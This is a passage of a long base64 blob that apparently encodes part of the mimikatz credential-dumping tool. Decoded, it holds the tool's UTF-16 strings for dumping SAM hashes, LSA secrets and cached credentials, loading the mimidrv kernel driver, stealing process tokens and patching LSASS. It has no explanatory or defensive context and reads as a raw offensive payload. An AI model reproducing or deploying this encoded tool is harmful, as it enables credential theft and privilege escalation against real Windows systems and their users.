nAC4AZABsAGwAAAAAAAAAAAB3AGUAdgB0AHMAdgBjAC4AZABsAGwAAABFAHYAZQBuAHQATABvAGcAAAAAAAAAAABTAGUAYwB1AHIAaQB0AHkAAAAAAAAAAABVAHMAaQBuAGcAIAAiACUAcwAiACAAZQB2AGUAbgB0ACAAbABvAGcAIAA6AAoAAAAtACAAJQB1ACAAZQB2AGUAbgB0ACgAcwApAAoAAAAAAC0AIABDAGwAZQBhAHIAZQBkACAAIQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBlAHYAZQBuAHQAXwBjAGwAZQBhAHIAIAA7ACAAQwBsAGUAYQByAEUAdgBlAG4AdABMAG8AZwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AZQB2AGUAbgB0AF8AYwBsAGUAYQByACAAOwAgAE8AcABlAG4ARQB2AGUAbgB0AEwAbwBnACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAATABpAHMAdAAgAG0AaQBuAGkAZgBpAGwAdABlAHIAcwAAAAAAAAAAAG0AaQBuAGkAZgBpAGwAdABlAHIAcwAAAEwAaQBzAHQAIABGAFMAIABmAGkAbAB0AGUAcgBzAAAAZgBpAGwAdABlAHIAcwAAAFIAZQBtAG8AdgBlACAAbwBiAGoAZQBjAHQAIABuAG8AdABpAGYAeQAgAGMAYQBsAGwAYgBhAGMAawAAAAAAAABuAG8AdABpAGYATwBiAGoAZQBjAHQAUgBlAG0AbwB2AGUAAAAAAAAAUgBlAG0AbwB2AGUAIABwAHIAbwBjAGUAcwBzACAAbgBvAHQAaQBmAHkAIABjAGEAbABsAGIAYQBjAGsAAAAAAG4AbwB0AGkAZgBQAHIAbwBjAGUAcwBzAFIAZQBtAG8AdgBlAAAAAABMAGkAcwB0ACAAbwBiAGoAZQBjAHQAIABuAG8AdABpAGYAeQAgAGMAYQBsAGwAYgBhAGMAawBzAAAAAAAAAAAAbgBvAHQAaQBmAE8AYgBqAGUAYwB0AAAATABpAHMAdAAgAHIAZQBnAGkAcwB0AHIAeQAgAG4AbwB0AGkAZgB5ACAAYwBhAGwAbABiAGEAYwBrAHMAAAAAAG4AbwB0AGkAZgBSAGUAZwAAAAAAAAAAAEwAaQBzAHQAIABpAG0AYQBnAGUAIABuAG8AdABpAGYAeQAgAGMAYQBsAGwAYgBhAGMAawBzAAAAbgBvAHQAaQBmAEkAbQBhAGcAZQAAAAAATABpAHMAdAAgAHQAaAByAGUAYQBkACAAbgBvAHQAaQBmAHkAIABjAGEAbABsAGIAYQBjAGsAcwAAAAAAAAAAAG4AbwB0AGkAZgBUAGgAcgBlAGEAZAAAAEwAaQBzAHQAIABwAHIAbwBjAGUAcwBzACAAbgBvAHQAaQBmAHkAIABjAGEAbABsAGIAYQBjAGsAcwAAAAAAAABuAG8AdABpAGYAUAByAG8AYwBlAHMAcwAAAAAAAAAAAEwAaQBzAHQAIABTAFMARABUAAAAAAAAAHMAcwBkAHQAAAAAAAAAAABMAGkAcwB0ACAAbQBvAGQAdQBsAGUAcwAAAAAAAAAAAG0AbwBkAHUAbABlAHMAAABTAGUAdAAgAGEAbABsACAAcAByAGkAdgBpAGwAZQBnAGUAIABvAG4AIABwAHIAbwBjAGUAcwBzAAAAAAAAAAAAcAByAG8AYwBlAHMAcwBQAHIAaQB2AGkAbABlAGcAZQAAAAAAAAAAAEQAdQBwAGwAaQBjAGEAdABlACAAcAByAG8AYwBlAHMAcwAgAHQAbwBrAGUAbgAAAHAAcgBvAGMAZQBzAHMAVABvAGsAZQBuAAAAAAAAAAAAUAByAG8AdABlAGMAdAAgAHAAcgBvAGMAZQBzAHMAAABwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAAAAAAEIAUwBPAEQAIAAhAAAAAABiAHMAbwBkAAAAAAAAAAAAUABpAG4AZwAgAHQAaABlACAAZAByAGkAdgBlAHIAAABwAGkAbgBnAAAAAAAAAAAAUgBlAG0AbwB2AGUAIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgACgAbQBpAG0AaQBkAHIAdgApAAAAAAAtAAAAAAAAAAAAAABJAG4AcwB0AGEAbABsACAAYQBuAGQALwBvAHIAIABzAHQAYQByAHQAIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgACgAbQBpAG0AaQBkAHIAdgApAAAAAAArAAAAAAAAAHIAZQBtAG8AdgBlAAAAAABMAGkAcwB0ACAAcAByAG8AYwBlAHMAcwAAAAAAAAAAAHAAcgBvAGMAZQBzAHMAAABtAGkAbQBpAGQAcgB2AC4AcwB5AHMAAABtAGkAbQBpAGQAcgB2AAAAWwArAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAGEAbAByAGUAYQBkAHkAIAByAGUAZwBpAHMAdABlAHIAZQBkAAoAAABbACoAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAbgBvAHQAIABwAHIAZQBzAGUAbgB0AAoAAAAAAAAAAABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgACgAbQBpAG0AaQBkAHIAdgApAAAAAAAAAFsAKwBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIABzAHUAYwBjAGUAcwBzAGYAdQBsAGwAeQAgAHIAZQBnAGkAcwB0AGUAcgBlAGQACgAAAAAAAAAAAFsAKwBdACAAbQBpAG0AaQBrAGEAdAB6ACAAZAByAGkAdgBlAHIAIABBAEMATAAgAHQAbwAgAGUAdgBlAHIAeQBvAG4AZQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAVwBvAHIAbABkAFQAbwBNAGkAbQBpAGsAYQB0AHoAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAAQwByAGUAYQB0AGUAUwBlAHIAdgBpAGMAZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwBpAHMARgBpAGwAZQBFAHgAaQBzAHQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAGEAZABkAF8AbQBpAG0AaQBkAHIAdgAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwBnAGUAdABBAGIAcwBvAGwAdQB0AGUAUABhAHQAaABPAGYAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAATwBwAGUAbgBTAGUAcgB2AGkAYwBlACAAKAAwAHgAJQAwADgAeAApAAoAAABbACsAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAcwB0AGEAcgB0AGUAZAAKAAAAAAAAAAAAWwAqAF0AIABtAGkAbQBpAGsAYQB0AHoAIABkAHIAaQB2AGUAcgAgAGEAbAByAGUAYQBkAHkAIABzAHQAYQByAHQAZQBkAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AYQBkAGQAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAFMAdABhAHIAdABTAGUAcgB2AGkAYwBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBhAGQAZABfAG0AaQBtAGkAZAByAHYAIAA7ACAATwBwAGUAbgBTAEMATQBhAG4AYQBnAGUAcgAoAGMAcgBlAGEAdABlACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABbACsAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAcwB0AG8AcABwAGUAZAAKAAAAAAAAAAAAAAAAAAAAAABbACoAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAbgBvAHQAIAByAHUAbgBuAGkAbgBnAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwByAGUAbQBvAHYAZQBfAG0AaQBtAGkAZAByAHYAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AcwB0AG8AcAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAABbACsAXQAgAG0AaQBtAGkAawBhAHQAegAgAGQAcgBpAHYAZQByACAAcgBlAG0AbwB2AGUAZAAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AcgBlAG0AbwB2AGUAXwBtAGkAbQBpAGQAcgB2ACAAOwAgAGsAdQBsAGwAXwBtAF8AcwBlAHIAdgBpAGMAZQBfAHIAZQBtAG8AdgBlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABQAHIAbwBjAGUAcwBzACAAOgAgACUAcwAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBwAHIAbwBjAGUAcwBzAFAAcgBvAHQAZQBjAHQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAUAByAG8AYwBlAHMAcwBJAGQARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAHAAaQBkAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBuAGUAbABfAHAAcgBvAGMAZQBzAHMAUAByAG8AdABlAGMAdAAgADsAIABBAHIAZwB1AG0AZQBuAHQAIAAvAHAAcgBvAGMAZQBzAHMAOgBwAHIAbwBnAHIAYQBtAC4AZQB4AGUAIABvAHIAIAAvAHAAaQBkADoAcAByAG8AYwBlAHMAcwBpAGQAIABuAGUAZQBkAGUAZAAKAAAAAAAAAAAAUABJAEQAIAAlAHUAIAAtAD4AIAAlADAAMgB4AC8AJQAwADIAeAAgAFsAJQAxAHgALQAlADEAeAAtACUAMQB4AF0ACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AcAByAG8AYwBlAHMAcwBQAHIAbwB0AGUAYwB0ACAAOwAgAE4AbwAgAFAASQBEAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAG4AZQBsAF8AcAByAG8AYwBlAHMAcwBQAHIAbwB0AGUAYwB0ACAAOwAgAFAAcgBvAHQAZQBjAHQAZQBkACAAcAByAG8AYwBlAHMAcwAgAG4AbwB0ACAAYQB2AGEAaQBsAGEAYgBsAGUAIABiAGUAZgBvAHIAZQAgAFcAaQBuAGQAbwB3AHMAIABWAGkAcwB0AGEACgAAAAAAZgByAG8AbQAAAAAAdABvAAAAAAAAAAAAVABvAGsAZQBuACAAZgByAG8AbQAgAHAAcgBvAGMAZQBzAHMAIAAlAHUAIAB0AG8AIABwAHIAbwBjAGUAcwBzACAAJQB1AAoAAAAAAAAAAAAgACoAIABmAHIAbwBtACAAMAAgAHcAaQBsAGwAIAB0AGEAawBlACAAUwBZAFMAVABFAE0AIAB0AG8AawBlAG4ACgAAAAAAAAAAAAAAAAAAACAAKgAgAHQAbwAgADAAIAB3AGkAbABsACAAdABhAGsAZQAgAGEAbABsACAAJwBjAG0AZAAnACAAYQBuAGQAIAAnAG0AaQBtAGkAawBhAHQAegAnACAAcAByAG8AYwBlAHMAcwAKAAAAVABhAHIAZwBlAHQAIAA9ACAAMAB4ACUAcAAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAbgBlAGwAXwBuAG8AdABpAGYAeQBHAGUAbgBlAHIAaQBjAFIAZQBtAG8AdgBlACAAOwAgAE4AbwAgAGEAZABkAHIAZQBzAHMAPwAKAAAAAABLAGUAcgBiAGUAcgBvAHMALQBOAGUAdwBlAHIALQBLAGUAeQBzAAAASwBlAHIAYgBlAHIAbwBzAAAAAAAAAAAAVwBEAGkAZwBlAHMAdAAAAEMATABFAEEAUgBUAEUAWABUAAAAAAAAAFAAcgBpAG0AYQByAHkAAABrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAAAAAAAAAAAG4AdABkAGwAbAAuAGQAbABsAAAAAAAAAGwAcwBhAHMAcgB2AC4AZABsAGwAAAAAAHMAYQBtAHMAcgB2AC4AZABsAGwAAAAAAEQAYQB0AGEAAAAAAAAAAABHAEIARwAAAFMAawBlAHcAMQAAAEoARAAAAAAAAAAAAEQAZQBmAGEAdQBsAHQAAABDAHUAcgByAGUAbgB0AAAAQQBzAGsAIABMAFMAQQAgAFMAZQByAHYAZQByACAAdABvACAAcgBlAHQAcgBpAGUAdgBlACAAUwBBAE0ALwBBAEQAIABlAG4AdAByAGkAZQBzACAAKABuAG8AcgBtAGEAbAAsACAAcABhAHQAYwBoACAAbwBuACAAdABoAGUAIABmAGwAeQAgAG8AcgAgAGkAbgBqAGUAYwB0ACkAAAAAAGwAcwBhAAAAAAAAAAAAAABHAGUAdAAgAHQAaABlACAAUwB5AHMASwBlAHkAIAB0AG8AIABkAGUAYwByAHkAcAB0ACAATgBMACQASwBNACAAdABoAGUAbgAgAE0AUwBDAGEAYwBoAGUAKAB2ADIAKQAgACgAZgByAG8AbQAgAHIAZQBnAGkAcwB0AHIAeQAgAG8AcgAgAGgAaQB2AGUAcwApAAAAAAAAAGMAYQBjAGgAZQAAAAAAAAAAAAAAAAAAAEcAZQB0ACAAdABoAGUAIABTAHkAcwBLAGUAeQAgAHQAbwAgAGQAZQBjAHIAeQBwAHQAIABTAEUAQwBSAEUAVABTACAAZQBuAHQAcgBpAGUAcwAgACgAZgByAG8AbQAgAHIAZQBnAGkAcwB0AHIAeQAgAG8AcgAgAGgAaQB2AGUAcwApAAAAAABzAGUAYwByAGUAdABzAAAAAAAAAAAAAABHAGUAdAAgAHQAaABlACAAUwB5AHMASwBlAHkAIAB0AG8AIABkAGUAYwByAHkAcAB0ACAAUwBBAE0AIABlAG4AdAByAGkAZQBzACAAKABmAHIAbwBtACAAcgBlAGcAaQBzAHQAcgB5ACAAbwByACAAaABpAHYAZQBzACkAAAAAAHMAYQBtAAAATABzAGEARAB1AG0AcAAgAG0AbwBkAHUAbABlAAAAAABsAHMAYQBkAHUAbQBwAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGEAbQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAFkAUwBUAEUATQAgAGgAaQB2AGUAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAYQBtACAAOwAgAEMAcgBlAGEAdABlAEYAaQBsAGUAIAAoAFMAQQBNACAAaABpAHYAZQApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAFMAWQBTAFQARQBNAAAAAABTAEEATQAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAYQBtACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIAAoAFMAQQBNACkAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAHIAZQB0AHMATwByAEMAYQBjAGgAZQAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKABTAEUAQwBVAFIASQBUAFkAIABoAGkAdgBlACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBzAGUAYwByAGUAdABzAE8AcgBDAGEAYwBoAGUAIAA7ACAAQwByAGUAYQB0AGUARgBpAGwAZQAgACgAUwBZAFMAVABFAE0AIABoAGkAdgBlACkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAFMARQBDAFUAUgBJAFQAWQAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAHIAZQB0AHMATwByAEMAYQBjAGgAZQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAKABTAEUAQwBVAFIASQBUAFkAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAQwBvAG4AdAByAG8AbABTAGUAdAAwADAAMAAAAAAAAABTAGUAbABlAGMAdAAAAAAAJQAwADMAdQAAAAAAJQB4AAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABTAHkAcwBrAGUAeQAgADsAIABMAFMAQQAgAEsAZQB5ACAAQwBsAGEAcwBzACAAcgBlAGEAZAAgAGUAcgByAG8AcgAKAAAAAABEAG8AbQBhAGkAbgAgADoAIAAAAAAAAABDAG8AbgB0AHIAbwBsAFwAQwBvAG0AcAB1AHQAZQByAE4AYQBtAGUAXABDAG8AbQBwAHUAdABlAHIATgBhAG0AZQAAAAAAAABDAG8AbQBwAHUAdABlAHIATgBhAG0AZQAAAAAAAAAAACUAcwAKAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAQwBvAG0AcAB1AHQAZQByAEEAbgBkAFMAeQBzAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIABDAG8AbQBwAHUAdABlAHIATgBhAG0AZQAgAEsATwAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAQwBvAG0AcAB1AHQAZQByAEEAbgBkAFMAeQBzAGsAZQB5ACAAOwAgAHAAcgBlACAALQAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIABDAG8AbQBwAHUAdABlAHIATgBhAG0AZQAgAEsATwAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEMAbwBtAHAAdQB0AGUAcgBBAG4AZABTAHkAcwBrAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAQwBvAG0AcAB1AHQAZQByAE4AYQBtAGUAIABLAE8ACgAAAAAAAABTAHkAcwBLAGUAeQAgADoAIAAAAAAAAABDAG8AbgB0AHIAbwBsAFwATABTAEEAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEMAbwBtAHAAdQB0AGUAcgBBAG4AZABTAHkAcwBrAGUAeQAgADsAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABTAHkAcwBrAGUAeQAgAEsATwAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABDAG8AbQBwAHUAdABlAHIAQQBuAGQAUwB5AHMAawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAZwBpAHMAdAByAHkAXwBSAGUAZwBPAHAAZQBuAEsAZQB5AEUAeAAgAEwAUwBBACAASwBPAAoAAAAAAAAAAABTAEEATQBcAEQAbwBtAGEAaQBuAHMAXABBAGMAYwBvAHUAbgB0AAAAVQBzAGUAcgBzAAAAAAAAAE4AYQBtAGUAcwAAAAAAAAAKAFIASQBEACAAIAA6ACAAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAVgAAAAAAAABVAHMAZQByACAAOgAgACUALgAqAHMACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAAVgAgAEsATwAKAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABVAHMAZQByAHMAQQBuAGQAUwBhAG0ASwBlAHkAIAA7ACAAcAByAGUAIAAtACAAawB1AGwAbABfAG0AXwByAGUAZwBpAHMAdAByAHkAXwBSAGUAZwBRAHUAZQByAHkAVgBhAGwAdQBlAEUAeAAgAFYAIABLAE8ACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABLAGUAIABLAE8ACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AFUAcwBlAHIAcwBBAG4AZABTAGEAbQBLAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAE8AcABlAG4ASwBlAHkARQB4ACAAUwBBAE0AIABBAGMAYwBvAHUAbgB0AHMAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAE4AVABMAE0AAAAAAAAAAABMAE0AIAAgAAAAAAAAAAAAJQBzACAAOgAgAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAGcAZQB0AEgAYQBzAGgAIAA7ACAAUgB0AGwARABlAGMAcgB5AHAAdABEAEUAUwAyAGIAbABvAGMAawBzADEARABXAE8AUgBEAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQASABhAHMAaAAgADsAIABSAHQAbABFAG4AYwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAQQBSAEMANAAAAAAAAAAAAAoAUwBBAE0ASwBlAHkAIAA6ACAAAAAAAEYAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBsAHMAYQBkAHUAbQBwAF8AZwBlAHQAUwBhAG0ASwBlAHkAIAA7ACAAUgB0AGwARQBuAGMAcgB5AHAAdABEAGUAYwByAHkAcAB0AEEAUgBDADQAIABLAE8AAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABTAGEAbQBLAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAARgAgAEsATwAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABTAGEAbQBLAGUAeQAgADsAIABwAHIAZQAgAC0AIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAARgAgAEsATwAAAFAAbwBsAGkAYwB5AAAAAABQAG8AbABSAGUAdgBpAHMAaQBvAG4AAAAKAFAAbwBsAGkAYwB5ACAAcwB1AGIAcwB5AHMAdABlAG0AIABpAHMAIAA6ACAAJQBoAHUALgAlAGgAdQAKAAAAUABvAGwARQBLAEwAaQBzAHQAAAAAAAAAUABvAGwAUwBlAGMAcgBlAHQARQBuAGMAcgB5AHAAdABpAG8AbgBLAGUAeQAAAAAATABTAEEAIABLAGUAeQAoAHMAKQAgADoAIAAlAHUALAAgAGQAZQBmAGEAdQBsAHQAIAAAAAAAAAAgACAAWwAlADAAMgB1AF0AIAAAACAAAABMAFMAQQAgAEsAZQB5ACAAOgAgAAAAAABTAGUAYwByAGUAdABzAAAAcwBlAHIAdgBpAGMAZQBzAAAAAAAAAAAACgBTAGUAYwByAGUAdAAgACAAOgAgACUAcwAAAAAAAABfAFMAQwBfAAAAAAAAAAAAQwB1AHIAcgBWAGEAbAAAAAoAYwB1AHIALwAAAAAAAABPAGwAZABWAGEAbAAAAAAACgBvAGwAZAAvAAAAAAAAAFMAZQBjAHIAZQB0AHMAXABOAEwAJABLAE0AXABDAHUAcgByAFYAYQBsAAAAAAAAAEMAYQBjAGgAZQAAAAAAAABOAEwAJABJAHQAZQByAGEAdABpAG8AbgBDAG8AdQBuAHQAAAAAAAAAKgAgAE4ATAAkAEkAdABlAHIAYQB0AGkAbwBuAEMAbwB1AG4AdAAgAGkAcwAgACUAdQAsACAAJQB1ACAAcgBlAGEAbAAgAGkAdABlAHIAYQB0AGkAbwBuACgAcwApAAoAAAAAAAAAAAAqACAARABDAEMAMQAgAG0AbwBkAGUAIAAhAAoAAAAAAAAAAAAAAAAAKgAgAEkAdABlAHIAYQB0AGkAbwBuACAAaQBzACAAcwBlAHQAIAB0AG8AIABkAGUAZgBhAHUAbAB0ACAAKAAxADAAMgA0ADAAKQAKAAAAAABOAEwAJABDAG8AbgB0AHIAbwBsAAAAAAAKAFsAJQBzACAALQAgAAAAXQAKAFIASQBEACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABOAEwASwBNAFMAZQBjAHIAZQB0AEEAbgBkAEMAYQBjAGgAZQAgADsAIABDAHIAeQBwAHQARABlAGMAcgB5AHAAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABOAEwASwBNAFMAZQBjAHIAZQB0AEEAbgBkAEMAYQBjAGgAZQAgADsAIABDAHIAeQBwAHQAUwBlAHQASwBlAHkAUABhAHIAYQBtACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABOAEwASwBNAFMAZQBjAHIAZQB0AEEAbgBkAEMAYQBjAGgAZQAgADsAIABDAHIAeQBwAHQASQBtAHAAbwByAHQASwBlAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBnAGUAdABOAEwASwBNAFMAZQBjAHIAZQB0AEEAbgBkAEMAYQBjAGgAZQAgADsAIABSAHQAbABFAG4AYwByAHkAcAB0AEQAZQBjAHIAeQBwAHQAUgBDADQAIAA6ACAAMAB4ACUAMAA4AHgACgAAAFUAcwBlAHIAIAAgACAAIAAgACAAOgAgACUALgAqAHMAXAAlAC4AKgBzAAoAAAAAAE0AcwBDAGEAYwBoAGUAVgAlAGMAIAA6ACAAAAAAAAAATwBiAGoAZQBjAHQATgBhAG0AZQAAAAAAIAAvACAAcwBlAHIAdgBpAGMAZQAgACcAJQBzACcAIAB3AGkAdABoACAAdQBzAGUAcgBuAGEAbQBlACAAOgAgACUAcwAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGwAcwBhAGQAdQBtAHAAXwBkAGUAYwByAHkAcAB0AFMAZQBjAHIAZQB0ACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcAUQB1AGUAcgB5AFYAYQBsAHUAZQBFAHgAIABTAGUAYwByAGUAdAAgAHYAYQBsAHUAZQAgAEsATwAKAAAAAAAAACQATQBBAEMASABJAE4ARQAuAEEAQwBDAAAAAAAAAAAATgBUAEwATQA6AAAALwAAAHQAZQB4AHQAOgAgACUAdwBaAAAAAAAAAGgAZQB4ACAAOgAgAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AbABzAGEAZAB1AG0AcABfAHMAZQBjAF8AYQBlAHMAMgA1ADYAIAA7ACAAQwByAHkAcAB0AEQAZQBjAH